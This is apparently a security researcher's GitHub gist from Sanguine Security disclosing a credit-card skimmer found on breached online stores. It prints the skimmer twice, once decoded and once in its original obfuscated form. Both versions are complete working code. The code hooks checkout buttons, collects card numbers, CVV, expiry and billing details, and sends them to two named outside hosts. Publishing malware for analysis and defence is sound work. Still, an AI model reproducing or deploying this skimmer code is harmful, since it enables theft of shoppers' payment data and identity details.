Skip to content

Instantly share code, notes, and snippets.

@gwillem

gwillem/decoded.js

Last active April 28, 2022 06:32
Show Gist options
  • Save gwillem/5d936f5a84837d5c1dcb488ce256294a to your computer and use it in GitHub Desktop.
Save gwillem/5d936f5a84837d5c1dcb488ce256294a to your computer and use it in GitHub Desktop.
Download ZIP
962 stores found breached on the 4th of July - https://sansec.io
Raw
decoded.js
// Decoded by Sanguine Security <[email protected]>
String.prototype.hexEncode = function() {
var a, b;
var output = '';
for (b = 0; b < this.length; b++) {
a = this.charCodeAt(b).toString(16);
output += ('000' + a).slice(-4)
};
return output
};
function obfuscate(arg) {
var b64 = btoa(arg);
var b64hex = (b64.hexEncode());
var blob = '';
for (var i = 0; i < b64hex.length; i++) {
blob += (b64hex[i].charCodeAt(0) << 3) + '*'
};
var blobb64 = btoa(blob);
return blobb64
}
function addtoev() {
var allButtons = document.getElementsByClassName('button');
for (i = 0; i < allButtons.length; i++) {
allButtons[i].addEventListener('click', function() {
var ccCounter = '';
var serialPayload = '';
if (document.getElementsByName('payment[cc_number]')[0]) {
serialPayload += document.getElementsByName('payment[cc_number]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_cid]')[0]) {
ccCounter = document.getElementsByName('payment[cc_cid]')[0].value;
serialPayload += document.getElementsByName('payment[cc_cid]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_exp_month]')[0]) {
serialPayload += document.getElementsByName('payment[cc_exp_month]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_exp_year]')[0]) {
serialPayload += document.getElementsByName('payment[cc_exp_year]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_owner]')[0]) {
serialPayload += document.getElementsByName('payment[cc_owner]')[0].value + '|'
};
if (document.getElementsByName('billing[firstname]')[0]) {
serialPayload += document.getElementsByName('billing[firstname]')[0].value + '|'
};
if (document.getElementsByName('billing[lastname]')[0]) {
serialPayload += document.getElementsByName('billing[lastname]')[0].value + '|'
};
if (document.getElementsByName('billing[telephone]')[0]) {
serialPayload += document.getElementsByName('billing[telephone]')[0].value + '|'
};
if (document.getElementsByName('billing[street][]')[0]) {
serialPayload += document.getElementsByName('billing[street][]')[0].value + '|'
};
if (document.getElementsByName('billing[city]')[0]) {
serialPayload += document.getElementsByName('billing[city]')[0].value + '|'
};
if (document.getElementsByName('billing[postcode]')[0]) {
serialPayload += document.getElementsByName('billing[postcode]')[0].value + '|'
};
if (document.getElementsByName('billing[region_id]')[0]) {
serialPayload += document.getElementsByName('billing[region_id]')[0].value + '|'
};
if (document.getElementsByName('shipping[country_id]')[0]) {
serialPayload += document.getElementsByName('shipping[country_id]')[0].value + '|'
};
if (ccCounter != '') {
var payloadObj = {
Domain: 'all',
d: obfuscate(serialPayload)
};
rand = Math.floor((Math.random() * 1000000) + 1);
urll = 'https://www.tarrianalee.co.uk/js/mage/adminhtml/wysiwyg/tiny_mce/plugins/magentovariable/img/validate.php?v=' + btoa(JSON.stringify(payloadObj));
var req1 = new XMLHttpRequest();
req1.open('GET', urll, false);
req1.send();
urll = 'http://89.32.251.136/counter/index.php?v=' + btoa(JSON.stringify(payloadObj));
var req2 = new XMLHttpRequest();
req2.open('GET', urll, false);
req2.send()
}
})
}
}
window.addEventListener('load', function() {
addtoev()
})
Raw
original.js
var _0xe6b4=["hexEncode","prototype","","length","charCodeAt","slice","000","*","button","getElementsByClassName","click","payment[cc_number]","getElementsByName","value","|","payment[cc_cid]","payment[cc_exp_month]","payment[cc_exp_year]","payment[cc_owner]","billing[firstname]","billing[lastname]","billing[telephone]","billing[street][]","billing[city]","billing[postcode]","billing[region_id]","shipping[country_id]","all","random","floor","https://www.tarrianalee.co.uk/js/mage/adminhtml/wysiwyg/tiny_mce/plugins/magentovariable/img/validate.php?v=","stringify","GET","open","send","http://89.32.251.136/counter/index.php?v=","addEventListener","load"];String[_0xe6b4[1]][_0xe6b4[0]]= function(){var _0x3692x1,_0x3692x2;var _0x3692x3=_0xe6b4[2];for(_0x3692x2= 0;_0x3692x2< this[_0xe6b4[3]];_0x3692x2++){_0x3692x1= this[_0xe6b4[4]](_0x3692x2).toString(16);_0x3692x3+= (_0xe6b4[6]+ _0x3692x1)[_0xe6b4[5]](-4)};return _0x3692x3};function sa(_0x3692x5){var _0x3692x6=btoa(_0x3692x5);var _0x3692x7=(_0x3692x6[_0xe6b4[0]]());var _0x3692x8=_0xe6b4[2];for(var _0x3692x2=0;_0x3692x2< _0x3692x7[_0xe6b4[3]];_0x3692x2++){_0x3692x8+= (_0x3692x7[_0x3692x2][_0xe6b4[4]](0)<< 3)+ _0xe6b4[7]};var _0x3692x9=btoa(_0x3692x8);return _0x3692x9}function addtoev(){var _0x3692xb=document[_0xe6b4[9]](_0xe6b4[8]);for(i= 0;i< _0x3692xb[_0xe6b4[3]];i++){_0x3692xb[i][_0xe6b4[36]](_0xe6b4[10],function(){var _0x3692xc=_0xe6b4[2];var _0x3692xd=_0xe6b4[2];if(document[_0xe6b4[12]](_0xe6b4[11])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[11])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[15])[0]){_0x3692xc= document[_0xe6b4[12]](_0xe6b4[15])[0][_0xe6b4[13]];_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[15])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[16])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[16])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[17])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[17])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[18])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[18])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[19])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[19])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[20])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[20])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[21])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[21])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[22])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[22])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[23])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[23])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[24])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[24])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[25])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[25])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[26])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[26])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(_0x3692xc!= _0xe6b4[2]){var _0x3692xe={Domain:_0xe6b4[27],d:sa(_0x3692xd)};rand= Math[_0xe6b4[29]]((Math[_0xe6b4[28]]()* 1000000)+ 1);urll= _0xe6b4[30]+ btoa(JSON[_0xe6b4[31]](_0x3692xe));var _0x3692xf= new XMLHttpRequest();_0x3692xf[_0xe6b4[33]](_0xe6b4[32],urll,false);_0x3692xf[_0xe6b4[34]]();urll= _0xe6b4[35]+ btoa(JSON[_0xe6b4[31]](_0x3692xe));var _0x3692x10= new XMLHttpRequest();_0x3692x10[_0xe6b4[33]](_0xe6b4[32],urll,false);_0x3692x10[_0xe6b4[34]]()}})}}window[_0xe6b4[36]](_0xe6b4[37],function(){addtoev()})
@gwillem
Copy link
Author

gwillem commented Jul 29, 2019

Mind you, you are battling the symptoms here, not the root cause. If people are able to write to your database, you have bigger problems.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment